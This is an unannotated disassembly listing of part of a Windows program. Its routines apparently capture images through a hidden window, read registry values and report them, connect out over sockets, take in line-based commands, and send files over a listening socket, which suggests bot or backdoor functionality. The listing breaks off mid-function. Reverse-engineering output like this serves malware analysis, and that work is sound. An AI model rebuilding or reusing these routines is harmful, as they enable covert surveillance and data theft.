; ---------------------------------------------------------------------------
loc_415F3F: ; CODE XREF: sub_415D1B+C7�j
; sub_415D1B+D9�j ...
push edi
call ds:dword_4E2E84 ; DeleteDC
push [ebp+var_4]
call ds:dword_4E2E84 ; DeleteDC
loc_415F4F: ; CODE XREF: sub_415D1B+23�j
xor eax, eax
loc_415F51: ; CODE XREF: sub_415D1B+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_415D1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F56 proc near ; CODE XREF: sub_401C87+74CE�p
var_34 = byte ptr -34h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
xor esi, esi
push edi
inc esi
xor ebx, ebx
push esi
push ds:dword_4EABD8
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_4E2F18
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_415F94
mov eax, esi
jmp loc_41614A
; ---------------------------------------------------------------------------
loc_415F94: ; CODE XREF: sub_415F56+35�j
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_415FB1
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_4E3024 ; SendMessageA
jmp short loc_415FB3
; ---------------------------------------------------------------------------
loc_415FB1: ; CODE XREF: sub_415F56+47�j
xor eax, eax
loc_415FB3: ; CODE XREF: sub_415F56+59�j
cmp eax, ebx
jnz short loc_415FBE
loc_415FB7: ; CODE XREF: sub_415F56+88�j
; sub_415F56+BC�j
mov ebx, esi
jmp loc_41613F
; ---------------------------------------------------------------------------
loc_415FBE: ; CODE XREF: sub_415F56+5F�j
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_415FDB
lea eax, [ebp+var_34]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_4E3024 ; SendMessageA
loc_415FDB: ; CODE XREF: sub_415F56+71�j
cmp [ebp+var_20], ebx
jz short loc_415FB7
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_416001
push ebx
push ebx
push edi
push [ebp+var_4]
call ds:dword_4E3024 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_416004
; ---------------------------------------------------------------------------
loc_416001: ; CODE XREF: sub_415F56+98�j
mov [ebp+arg_4], ebx
loc_416004: ; CODE XREF: sub_415F56+A9�j
push [ebp+arg_4]
call sub_41BE40
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz short loc_415FB7
push [ebp+arg_4]
call sub_41BE40
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41602B
xor ebx, ebx
inc ebx
jmp loc_41613F
; ---------------------------------------------------------------------------
loc_41602B: ; CODE XREF: sub_415F56+CB�j
push [ebp+var_4]
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_416048
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_4E3024 ; SendMessageA
loc_416048: ; CODE XREF: sub_415F56+E0�j
push [ebp+arg_4]
push [ebp+var_8]
push esi
call sub_41FBF0
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_416063
mov ecx, 280h
loc_416063: ; CODE XREF: sub_415F56+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_41606F
mov eax, 1E0h
loc_41606F: ; CODE XREF: sub_415F56+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_4E2F68 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_4160B9
push esi
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_4E3024 ; SendMessageA
loc_4160B9: ; CODE XREF: sub_415F56+153�j
push [ebp+var_4]
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_4160D6
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call ds:dword_4E3024 ; SendMessageA
loc_4160D6: ; CODE XREF: sub_415F56+16E�j
push [ebp+var_4]
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_4160F5
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call ds:dword_4E3024 ; SendMessageA
loc_4160F5: ; CODE XREF: sub_415F56+18B�j
push [ebp+var_4]
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_416112
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_4E3024 ; SendMessageA
loc_416112: ; CODE XREF: sub_415F56+1AA�j
push [ebp+var_8]
call sub_41C9D0
push esi
call sub_41C9D0
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_41613F
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call ds:dword_4E3024 ; SendMessageA
loc_41613F: ; CODE XREF: sub_415F56+63�j
; sub_415F56+D0�j ...
push [ebp+var_4]
call ds:dword_4E3078 ; DestroyWindow
mov eax, ebx
loc_41614A: ; CODE XREF: sub_415F56+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_415F56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41614F proc near ; CODE XREF: sub_401C87+758A�p
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
xor esi, esi
push edi
inc esi
xor ebx, ebx
push esi
push ds:dword_4EABD8
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow_0 ; "Window"
call ds:dword_4E2F18
mov edi, eax
cmp edi, ebx
jnz short loc_41618D
mov eax, esi
jmp loc_416389
; ---------------------------------------------------------------------------
loc_41618D: ; CODE XREF: sub_41614F+35�j
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_4161AA
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_4E3024 ; SendMessageA
jmp short loc_4161AC
; ---------------------------------------------------------------------------
loc_4161AA: ; CODE XREF: sub_41614F+47�j
xor eax, eax
loc_4161AC: ; CODE XREF: sub_41614F+59�j
cmp eax, ebx
jnz short loc_4161B7
loc_4161B0: ; CODE XREF: sub_41614F+8B�j
; sub_41614F+BC�j
mov ebx, esi
jmp loc_416380
; ---------------------------------------------------------------------------
loc_4161B7: ; CODE XREF: sub_41614F+5F�j
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_4161D7
lea eax, [ebp+var_90]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_4E3024 ; SendMessageA
loc_4161D7: ; CODE XREF: sub_41614F+71�j
cmp [ebp+var_7C], ebx
jz short loc_4161B0
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_4161FA
push ebx
push ebx
push 42Ch
push edi
call ds:dword_4E3024 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_4161FD
; ---------------------------------------------------------------------------
loc_4161FA: ; CODE XREF: sub_41614F+96�j
mov [ebp+arg_4], ebx
loc_4161FD: ; CODE XREF: sub_41614F+A9�j
push [ebp+arg_4]
call sub_41BE40
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_4161B0
push [ebp+arg_4]
call sub_41BE40
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_416224
xor ebx, ebx
inc ebx
jmp loc_416380
; ---------------------------------------------------------------------------
loc_416224: ; CODE XREF: sub_41614F+CB�j
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_416241
push [ebp+var_4]
push [ebp+arg_4]
push 42Ch
push edi
call ds:dword_4E3024 ; SendMessageA
loc_416241: ; CODE XREF: sub_41614F+DE�j
push [ebp+arg_4]
push [ebp+var_4]
push esi
call sub_41FBF0
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_41625C
mov ecx, 0A0h
loc_41625C: ; CODE XREF: sub_41614F+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_416266
push 78h
pop eax
loc_416266: ; CODE XREF: sub_41614F+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_4162AB
push esi
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_4E3024 ; SendMessageA
loc_4162AB: ; CODE XREF: sub_41614F+14A�j
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_4162C8
lea eax, [ebp+var_64]
push eax
push 60h
push 441h
push edi
call ds:dword_4E3024 ; SendMessageA
loc_4162C8: ; CODE XREF: sub_41614F+165�j
push edi
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_416306
lea eax, [ebp+var_64]
push eax
push 60h
push 440h
push edi
call ds:dword_4E3024 ; SendMessageA
loc_416306: ; CODE XREF: sub_41614F+1A3�j
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_416321
push [ebp+arg_0]
push ebx
push 414h
push edi
call ds:dword_4E3024 ; SendMessageA
loc_416321: ; CODE XREF: sub_41614F+1C0�j
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_41633A
push ebx
push ebx
push 43Eh
push edi
call ds:dword_4E3024 ; SendMessageA
loc_41633A: ; CODE XREF: sub_41614F+1DB�j
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_416357
push [ebp+var_4]
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_4E3024 ; SendMessageA
loc_416357: ; CODE XREF: sub_41614F+1F4�j
push [ebp+var_4]
call sub_41C9D0
push esi
call sub_41C9D0
pop ecx
pop ecx
push edi
call ds:dword_4E2F68 ; IsWindow
test eax, eax
jz short loc_416380
push ebx
push ebx
push 40Bh
push edi
call ds:dword_4E3024 ; SendMessageA
loc_416380: ; CODE XREF: sub_41614F+63�j
; sub_41614F+D0�j ...
push edi
call ds:dword_4E3078 ; DestroyWindow
mov eax, ebx
loc_416389: ; CODE XREF: sub_41614F+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_41614F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41638E proc near ; CODE XREF: sub_401C87+25AA�p
var_3F0 = byte ptr -3F0h
var_2EC = byte ptr -2ECh
var_EC = byte ptr -0ECh
var_6C = byte ptr -6Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F0h
push edi
xor edi, edi
cmp ds:off_44E134, edi
mov [ebp+var_8], 80h
jz loc_41653E
push ebx
push esi
mov eax, offset off_44E134
mov esi, offset dword_44E140
loc_4163B9: ; CODE XREF: sub_41638E+1A8�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push edi
push dword ptr [eax]
push dword ptr [esi-10h]
call ds:dword_4E3038 ; RegOpenKeyExA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_EC]
push eax
push edi
push edi
push dword ptr [esi-8]
push [ebp+var_4]
call ds:dword_4E2EC8 ; RegQueryValueExA
test eax, eax
jnz loc_416525
mov eax, [esi]
cmp eax, edi
jz loc_4164E5
push eax
lea eax, [ebp+var_EC]
push eax
lea eax, [ebp+var_3F0]
push offset dword_44E568
push eax
call sub_41EA60
lea eax, [ebp+var_3F0]
push (offset aSr+2)
push eax
call sub_41E490
mov ebx, eax
add esp, 18h
cmp ebx, edi
jz loc_416525
jmp short loc_416444
; ---------------------------------------------------------------------------
loc_416432: ; CODE XREF: sub_41638E+C7�j
push dword ptr [esi+4]
lea eax, [ebp+var_6C]
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_41645C
loc_416444: ; CODE XREF: sub_41638E+A2�j
push ebx
lea eax, [ebp+var_6C]
push 64h
push eax
call sub_41EFB0
add esp, 0Ch
test eax, eax
jnz short loc_416432
jmp loc_4164DC
; ---------------------------------------------------------------------------
loc_41645C: ; CODE XREF: sub_41638E+B4�j
push 3Dh
push dword ptr [esi+4]
call sub_41F720
pop ecx
test eax, eax
pop ecx
lea eax, [ebp+var_6C]
jz short loc_41649F
push (offset aSr+4)
push eax
call sub_41F870
push (offset aSr+6)
push edi
call sub_41F870
push eax
lea eax, [ebp+var_2EC]
push dword ptr [esi-4]
push offset dword_44E574
push eax
call sub_41EA60
add esp, 20h
jmp short loc_4164B7
; ---------------------------------------------------------------------------
loc_41649F: ; CODE XREF: sub_41638E+DF�j
push eax
lea eax, [ebp+var_2EC]
push dword ptr [esi-4]
push offset dword_44E58C
push eax
call sub_41EA60
add esp, 10h
loc_4164B7: ; CODE XREF: sub_41638E+10F�j
push edi
lea eax, [ebp+var_2EC]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
lea eax, [ebp+var_2EC]
push eax
call sub_415A3C
add esp, 18h
loc_4164DC: ; CODE XREF: sub_41638E+C9�j
push ebx
call sub_41BCF0
pop ecx
jmp short loc_416525
; ---------------------------------------------------------------------------
loc_4164E5: ; CODE XREF: sub_41638E+65�j
lea eax, [ebp+var_EC]
push eax
lea eax, [ebp+var_2EC]
push dword ptr [esi-4]
push offset dword_44E5A4
push eax
call sub_41EA60
push edi
lea eax, [ebp+var_2EC]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
lea eax, [ebp+var_2EC]
push eax
call sub_415A3C
add esp, 28h
loc_416525: ; CODE XREF: sub_41638E+5B�j
; sub_41638E+9C�j ...
push [ebp+var_4]
call ds:dword_4E2FA4 ; RegCloseKey
add esi, 18h
lea eax, [esi-0Ch]
cmp [eax], edi
jnz loc_4163B9
pop esi
pop ebx
loc_41653E: ; CODE XREF: sub_41638E+19�j
pop edi
leave
retn
sub_41638E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416541 proc near ; CODE XREF: sub_4165C7+33�p
; sub_416B2D+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call ds:dword_4E3048 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_4165BD
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call ds:dword_4E2FC8 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call ds:dword_4E3008 ; inet_addr
cmp eax, esi
jnz short loc_4165A2
push [ebp+arg_0]
call ds:dword_4E304C ; gethostbyname
test eax, eax
jz short loc_4165BD
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_4165A2: ; CODE XREF: sub_416541+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_4E2F70 ; connect
cmp eax, esi
jnz short loc_4165C1
push edi
call ds:dword_4E3060 ; closesocket
loc_4165BD: ; CODE XREF: sub_416541+1B�j
; sub_416541+58�j
mov eax, esi
jmp short loc_4165C3
; ---------------------------------------------------------------------------
loc_4165C1: ; CODE XREF: sub_416541+73�j
mov eax, edi
loc_4165C3: ; CODE XREF: sub_416541+7E�j
pop edi
pop esi
leave
retn
sub_416541 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4165C7 proc near ; DATA XREF: sub_401C87+9DE�o
var_11B4 = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_41EF80
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push [ebp+var_14]
xor esi, esi
inc esi
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_416541
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_41665A
lea eax, [ebp+var_11B4]
push offset unk_44E5BC
push eax
call sub_41EA60
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_41663D
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_409C75
add esp, 14h
loc_41663D: ; CODE XREF: sub_4165C7+59�j
lea eax, [ebp+var_11B4]
push eax
call sub_415A3C
push [ebp+var_10]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_41665A: ; CODE XREF: sub_4165C7+3F�j
push offset dword_4EABF4
push ebx
call sub_41A8ED
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4166C5
lea eax, [ebp+var_11B4]
push offset unk_44E5E0
push eax
call sub_41EA60
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_4166A1
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_409C75
add esp, 14h
loc_4166A1: ; CODE XREF: sub_4165C7+BD�j
lea eax, [ebp+var_11B4]
push eax
call sub_415A3C
pop ecx
push ebx
call ds:dword_4E3060 ; closesocket
push [ebp+var_10]
call sub_40B9A7
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_4166C5: ; CODE XREF: sub_4165C7+A3�j
push 64h
call ds:dword_4F534C ; Sleep
xor edi, edi
mov esi, 1000h
loc_4166D4: ; CODE XREF: sub_4165C7+168�j
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_11B4]
push edi
push esi
push eax
push ebx
call ds:dword_4E2FE0 ; recv
test eax, eax
jle short loc_416731
lea eax, [ebp+var_11B4]
push offset asc_44E610 ; "\n"
push eax
call sub_41F630
lea eax, [ebp+var_11B4]
push eax
call sub_41A6D9
add esp, 0Ch
test eax, eax
jz short loc_416731
push 64h
call ds:dword_4F534C ; Sleep
push 0Ah
call sub_40B8D3
test eax, eax
pop ecx
jnz short loc_4166D4
loc_416731: ; CODE XREF: sub_4165C7+130�j
; sub_4165C7+154�j
lea eax, [ebp+var_11B4]
push offset unk_44E614
push eax
call sub_41EA60
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_416764
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_409C75
add esp, 14h
loc_416764: ; CODE XREF: sub_4165C7+180�j
lea eax, [ebp+var_11B4]
push eax
call sub_415A3C
pop ecx
push ebx
call ds:dword_4E3060 ; closesocket
push [ebp+var_10]
call sub_40B9A7
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
sub_4165C7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416788 proc near ; DATA XREF: sub_401C87+78BC�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_3FC = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
xor ebx, ebx
xor esi, esi
inc ebx
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_10], esi
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call ds:dword_4E3048 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_4167D6
push offset unk_44E648
jmp loc_41698F
; ---------------------------------------------------------------------------
loc_4167D6: ; CODE XREF: sub_416788+42�j
push 10h
lea eax, [ebp+var_30]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_30], 2
push esi
call ds:dword_4E2FC8 ; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+var_30]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call ds:dword_4E2FF4 ; bind
test eax, eax
jz short loc_416814
push offset unk_44E66C
jmp loc_41698F
; ---------------------------------------------------------------------------
loc_416814: ; CODE XREF: sub_416788+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_30]
push eax
push edi
call ds:dword_4E2F6C ; getsockname
push [ebp+var_2E]
call ds:dword_4E2EF8 ; htons
mov [ebp+var_4], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_41BC70
pop ecx
loc_416846: ; CODE XREF: sub_416788+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_416859
push 5Fh
pop eax
jmp short loc_41685C
; ---------------------------------------------------------------------------
loc_416859: ; CODE XREF: sub_416788+CA�j
movsx eax, al
loc_41685C: ; CODE XREF: sub_416788+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_41BC70
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_416846
push ebx
push edi
call ds:dword_4E2FF0 ; listen
test eax, eax
jz short loc_41688F
push offset unk_44E690
jmp loc_41698F
; ---------------------------------------------------------------------------
loc_41688F: ; CODE XREF: sub_416788+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
call ds:off_4F53C0
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_4168B9
push offset unk_44E6B4
jmp loc_41698F
; ---------------------------------------------------------------------------
loc_4168B9: ; CODE XREF: sub_416788+125�j
push esi
push eax
call ds:off_4F53DC
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AEAD
pop ecx
push eax
call ds:dword_4E3008 ; inet_addr
push eax
call ds:dword_4E2FC4 ; htonl
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset dword_44E6D4
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_3FC]
push esi
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_409C75
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call ds:dword_4E2FB0 ; select
test eax, eax
jg short loc_416969
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset dword_44E6EC
push eax
push [ebp+var_1FC]
call sub_409C75
jmp loc_416A8D
; ---------------------------------------------------------------------------
loc_416969: ; CODE XREF: sub_416788+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call ds:dword_4E305C ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_4169A2
push offset unk_44E704
loc_41698F: ; CODE XREF: sub_416788+49�j
; sub_416788+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_41EA60
pop ecx
pop ecx
jmp loc_416A90
; ---------------------------------------------------------------------------
loc_4169A2: ; CODE XREF: sub_416788+200�j
push edi
call ds:dword_4E3060 ; closesocket
cmp [ebp+arg_0], esi
jz loc_416A54
mov edi, 400h
loc_4169B7: ; CODE XREF: sub_416788+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_4169C4
mov [ebp+var_4], eax
loc_4169C4: ; CODE XREF: sub_416788+237�j
push edi
lea eax, [ebp+var_A04]
push esi
push eax
call sub_41E4B0
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call ds:off_4F53F4
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call ds:off_4F53BC
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call ds:dword_4E3018 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call ds:dword_4E2FE0 ; recv
cmp eax, ebx
jl loc_416AE9
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_416AE9
sub [ebp+arg_0], eax
jnz loc_4169B7
mov edi, [ebp+var_18]
loc_416A54: ; CODE XREF: sub_416788+224�j
push [ebp+var_8]
call ds:off_4F533C
push [ebp+var_C]
push [ebp+var_10]
call sub_41727E
pop ecx
pop ecx
push eax
push [ebp+var_44]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset unk_44E728
push eax
call sub_41EA60
loc_416A8D: ; CODE XREF: sub_416788+1DC�j
add esp, 14h
loc_416A90: ; CODE XREF: sub_416788+215�j
cmp [ebp+var_50], esi
jnz short loc_416AB5
push esi
lea eax, [ebp+var_3FC]
push [ebp+var_54]
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_409C75
add esp, 14h
loc_416AB5: ; CODE XREF: sub_416788+30B�j
lea eax, [ebp+var_3FC]
push eax
call sub_415A3C
cmp edi, esi
pop ecx
jbe short loc_416ACD
push edi
call ds:dword_4E3060 ; closesocket
loc_416ACD: ; CODE XREF: sub_416788+33C�j
push [ebp+var_1F8]
call ds:dword_4E3060 ; closesocket
push [ebp+var_58]
call sub_40B9A7
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_416AE9: ; CODE XREF: sub_416788+2AF�j
; sub_416788+2BA�j
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset dword_44E754
push eax
push [ebp+var_1FC]
call sub_409C75
push offset dword_44E76C
call sub_415A3C
add esp, 18h
push [ebp+var_1F8]
call ds:dword_4E3060 ; closesocket
push [ebp+var_58]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_416788 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B2D proc near ; DATA XREF: sub_401C87+77E�o
var_14C4 = byte ptr -14C4h
var_4C4 = byte ptr -4C4h
var_2C4 = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_41EF80
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
xor esi, esi
xor ebx, ebx
inc esi
push 104h
mov [eax+1B0h], esi
lea eax, [ebp+var_2C4]
push eax
mov [ebp+var_8], ebx
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_2C4]
push offset dword_44E784
push eax
call sub_41EA60
add esp, 10h
lea eax, [ebp+var_2C4]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call ds:off_4F53C0
cmp eax, 0FFFFFFFFh
jnz short loc_416BB7
